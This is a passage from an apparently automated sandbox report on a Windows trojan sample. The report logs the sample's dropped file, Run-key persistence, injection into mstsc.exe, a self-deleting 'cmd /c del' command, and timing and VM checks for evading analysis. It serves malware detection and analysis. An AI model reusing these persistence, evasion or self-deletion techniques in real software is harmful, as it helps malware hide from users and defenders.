Source: 19.2.firefoxe.exe.9a0000.0.unpack, u0006/u0005.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: classification engine

Classification label: mal100.troj.evad.winEXE@14/3@4/2

Source: C:\Users\user\Desktop\kayx.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped

Jump to behavior

Source: C:\Windows\System32\conhost.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1632:120:WilError_01

Source: kayx.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\kayx.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll	Jump to behavior

Source: C:\Windows\explorer.exe

File read: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\kayx.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: kayx.exe	Virustotal: Detection: 34%
Source: kayx.exe	ReversingLabs: Detection: 45%

Source: C:\Users\user\Desktop\kayx.exe

File read: C:\Users\user\Desktop\kayx.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\kayx.exe 'C:\Users\user\Desktop\kayx.exe'
Source: unknown	Process created: C:\Users\user\Desktop\kayx.exe C:\Users\user\Desktop\kayx.exe
Source: unknown	Process created: C:\Users\user\Desktop\kayx.exe C:\Users\user\Desktop\kayx.exe
Source: unknown	Process created: C:\Users\user\Desktop\kayx.exe C:\Users\user\Desktop\kayx.exe
Source: unknown	Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exe 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exe'
Source: unknown	Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exe 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exe'
Source: unknown	Process created: C:\Windows\SysWOW64\mstsc.exe C:\Windows\SysWOW64\mstsc.exe
Source: unknown	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\kayx.exe'
Source: unknown	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\kayx.exe	Process created: C:\Users\user\Desktop\kayx.exe C:\Users\user\Desktop\kayx.exe	Jump to behavior
Source: C:\Users\user\Desktop\kayx.exe	Process created: C:\Users\user\Desktop\kayx.exe C:\Users\user\Desktop\kayx.exe	Jump to behavior
Source: C:\Users\user\Desktop\kayx.exe	Process created: C:\Users\user\Desktop\kayx.exe C:\Users\user\Desktop\kayx.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exe 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exe'	Jump to behavior
Source: C:\Windows\SysWOW64\mstsc.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\kayx.exe'	Jump to behavior

Source: C:\Windows\explorer.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{03C036F1-A186-11D0-824A-00AA005B4383}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\kayx.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: kayx.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: kayx.exe

Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source:	Binary string: wscui.pdbUGP source: explorer.exe, 00000012.00000000.376957565.000000000E1C0000.00000002.00000001.sdmp
Source:	Binary string: wntdll.pdbUGP source: kayx.exe, 00000011.00000003.351692207.0000000000AB0000.00000004.00000001.sdmp, mstsc.exe, 00000015.00000002.486610265.0000000004CAF000.00000040.00000001.sdmp
Source:	Binary string: wntdll.pdb source: kayx.exe, mstsc.exe, 00000015.00000002.486610265.0000000004CAF000.00000040.00000001.sdmp
Source:	Binary string: mstsc.pdbGCTL source: kayx.exe, 00000011.00000002.397529833.0000000002B00000.00000040.00000001.sdmp
Source:	Binary string: mstsc.pdb source: kayx.exe, 00000011.00000002.397529833.0000000002B00000.00000040.00000001.sdmp
Source:	Binary string: wscui.pdb source: explorer.exe, 00000012.00000000.376957565.000000000E1C0000.00000002.00000001.sdmp

Data Obfuscation:

Detected unpacking (changes PE section rights)

Show sources

Source: C:\Users\user\Desktop\kayx.exe

Unpacked PE file: 17.2.kayx.exe.400000.0.unpack .text:ER;.rsrc:R;.reloc:R; vs .text:ER;

Source: C:\Users\user\Desktop\kayx.exe	Code function: 1_2_0185A9A1 push edx; iretd	1_2_0185A9A2
Source: C:\Users\user\Desktop\kayx.exe	Code function: 1_2_05C48CE3 push E808AB5Eh; retf	1_2_05C48D01
Source: C:\Users\user\Desktop\kayx.exe	Code function: 1_2_05C48C8D push E808AB5Eh; retf	1_2_05C48D01
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_0041AD55 push eax; ret	17_2_0041ADA8
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_0041ADA2 push eax; ret	17_2_0041ADA8
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_0041ADAB push eax; ret	17_2_0041AE12
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_0041AE0C push eax; ret	17_2_0041AE12
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00414EC5 push CFF27278h; ret	17_2_00414EC0
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00414E85 push CFF27278h; ret	17_2_00414EC0
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00414740 push cs; iretd	17_2_00414779
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_0041478D push cs; iretd	17_2_00414779
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00E5D0D1 push ecx; ret	17_2_00E5D0E4
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_1_0041AD55 push eax; ret	17_1_0041ADA8
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_1_0041ADA2 push eax; ret	17_1_0041ADA8
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_1_0041ADAB push eax; ret	17_1_0041AE12
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_1_0041AE0C push eax; ret	17_1_0041AE12
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_1_00414EC5 push CFF27278h; ret	17_1_00414EC0
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_1_00414E85 push CFF27278h; ret	17_1_00414EC0
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_1_00414740 push cs; iretd	17_1_00414779
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_1_0041478D push cs; iretd	17_1_00414779

Source: initial sample	Static PE information: section name: .text entropy: 7.94131868162
Source: initial sample	Static PE information: section name: .text entropy: 7.94131868162

Source: C:\Users\user\Desktop\kayx.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exe

Jump to dropped file

Source: C:\Users\user\Desktop\kayx.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped	Jump to behavior
Source: C:\Users\user\Desktop\kayx.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exe	Jump to behavior
Source: C:\Users\user\Desktop\kayx.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exe\:Zone.Identifier:$DATA	Jump to behavior

Source: C:\Users\user\Desktop\kayx.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run firefoxe			Jump to behavior
Source: C:\Users\user\Desktop\kayx.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run firefoxe			Jump to behavior

Source: C:\Windows\explorer.exe

Registry key monitored for changes: HKEY_CURRENT_USER_Classes

Jump to behavior

Source: C:\Users\user\Desktop\kayx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\kayx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\kayx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\kayx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\kayx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\kayx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\kayx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\kayx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\kayx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\kayx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\kayx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\kayx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\kayx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\kayx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\kayx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\kayx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\kayx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\kayx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\kayx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\kayx.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mstsc.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Show sources

Source: kayx.exe, 00000001.00000002.355951256.0000000005BC0000.00000004.00000001.sdmp, firefoxe.exe, 00000013.00000002.488821328.0000000005540000.00000004.00000001.sdmp, firefoxe.exe, 00000014.00000002.485995375.00000000036F1000.00000004.00000001.sdmp

Binary or memory string: SBIEDLL.DLLHEAD%YCLYIDUONHMGOW.VBSKCREATEOBJECT("WSCRIPT.SHELL").RUN """

Tries to detect virtualization through RDTSC time measurements

Show sources

Source: C:\Users\user\Desktop\kayx.exe	RDTSC instruction interceptor: First address: 00000000004083C4 second address: 00000000004083CA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\kayx.exe	RDTSC instruction interceptor: First address: 000000000040875E second address: 0000000000408764 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\mstsc.exe	RDTSC instruction interceptor: First address: 0000000002F083C4 second address: 0000000002F083CA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\mstsc.exe	RDTSC instruction interceptor: First address: 0000000002F0875E second address: 0000000002F08764 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc

Source: C:\Users\user\Desktop\kayx.exe

Code function: 17_2_00408690 rdtsc

17_2_00408690

Source: C:\Users\user\Desktop\kayx.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Users\user\Desktop\kayx.exe TID: 6564

Thread sleep time: -922337203685477s >= -30000s

Jump to behavior

Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\mstsc.exe	Last function: Thread delayed

Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exe	File opened: C:\Users\user\AppData\	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exe	File opened: C:\Users\user\	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\	Jump to behavior

Source: explorer.exe, 00000012.00000000.377242682.000000000F67D000.00000004.00000001.sdmp	Binary or memory string: 00000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f563
Source: explorer.exe, 00000012.00000000.373920337.000000000871F000.00000004.00000001.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
Source: explorer.exe, 00000012.00000000.373920337.000000000871F000.00000004.00000001.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000:
Source: explorer.exe, 00000012.00000000.366341161.0000000004DF3000.00000004.00000001.sdmp	Binary or memory string: _VMware_SATA_CD00#5&}
Source: explorer.exe, 00000012.00000000.373348445.0000000008220000.00000002.00000001.sdmp	Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: explorer.exe, 00000012.00000000.373649853.0000000008640000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: firefoxe.exe, 00000014.00000002.485995375.00000000036F1000.00000004.00000001.sdmp	Binary or memory string: vmware
Source: explorer.exe, 00000012.00000000.377242682.000000000F67D000.00000004.00000001.sdmp	Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}B
Source: explorer.exe, 00000012.00000000.367147757.00000000055D0000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}V*(E
Source: explorer.exe, 00000012.00000000.373920337.000000000871F000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}~
Source: explorer.exe, 00000012.00000000.373920337.000000000871F000.00000004.00000001.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
Source: explorer.exe, 00000012.00000000.367196676.0000000005603000.00000004.00000001.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b},
Source: explorer.exe, 00000012.00000000.377242682.000000000F67D000.00000004.00000001.sdmp	Binary or memory string: 53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f
Source: explorer.exe, 00000012.00000000.377242682.000000000F67D000.00000004.00000001.sdmp	Binary or memory string: d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000012.00000000.373348445.0000000008220000.00000002.00000001.sdmp	Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: explorer.exe, 00000012.00000000.373348445.0000000008220000.00000002.00000001.sdmp	Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: explorer.exe, 00000012.00000000.373348445.0000000008220000.00000002.00000001.sdmp	Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

Source: C:\Users\user\Desktop\kayx.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\kayx.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\mstsc.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Users\user\Desktop\kayx.exe

Code function: 17_2_00408690 rdtsc

17_2_00408690

Source: C:\Users\user\Desktop\kayx.exe

Code function: 17_2_004098F0 LdrLoadDll,

17_2_004098F0

Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00E040E1 mov eax, dword ptr fs:[00000030h]	17_2_00E040E1
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00E040E1 mov eax, dword ptr fs:[00000030h]	17_2_00E040E1
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00E040E1 mov eax, dword ptr fs:[00000030h]	17_2_00E040E1
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00E058EC mov eax, dword ptr fs:[00000030h]	17_2_00E058EC
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00E9B8D0 mov eax, dword ptr fs:[00000030h]	17_2_00E9B8D0
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00E9B8D0 mov ecx, dword ptr fs:[00000030h]	17_2_00E9B8D0
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00E9B8D0 mov eax, dword ptr fs:[00000030h]	17_2_00E9B8D0
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00E9B8D0 mov eax, dword ptr fs:[00000030h]	17_2_00E9B8D0
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00E9B8D0 mov eax, dword ptr fs:[00000030h]	17_2_00E9B8D0
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00E9B8D0 mov eax, dword ptr fs:[00000030h]	17_2_00E9B8D0
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00E320A0 mov eax, dword ptr fs:[00000030h]	17_2_00E320A0
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00E320A0 mov eax, dword ptr fs:[00000030h]	17_2_00E320A0
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00E320A0 mov eax, dword ptr fs:[00000030h]	17_2_00E320A0
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00E320A0 mov eax, dword ptr fs:[00000030h]	17_2_00E320A0
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00E320A0 mov eax, dword ptr fs:[00000030h]	17_2_00E320A0
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00E320A0 mov eax, dword ptr fs:[00000030h]	17_2_00E320A0
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00E490AF mov eax, dword ptr fs:[00000030h]	17_2_00E490AF
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00E3F0BF mov ecx, dword ptr fs:[00000030h]	17_2_00E3F0BF
Source: C:\Users\user\Desktop\kayx.exe	Code function: 17_2_00E3F0BF mov eax, dword ptr fs:[00000030h]	17_2_00E3F0BF
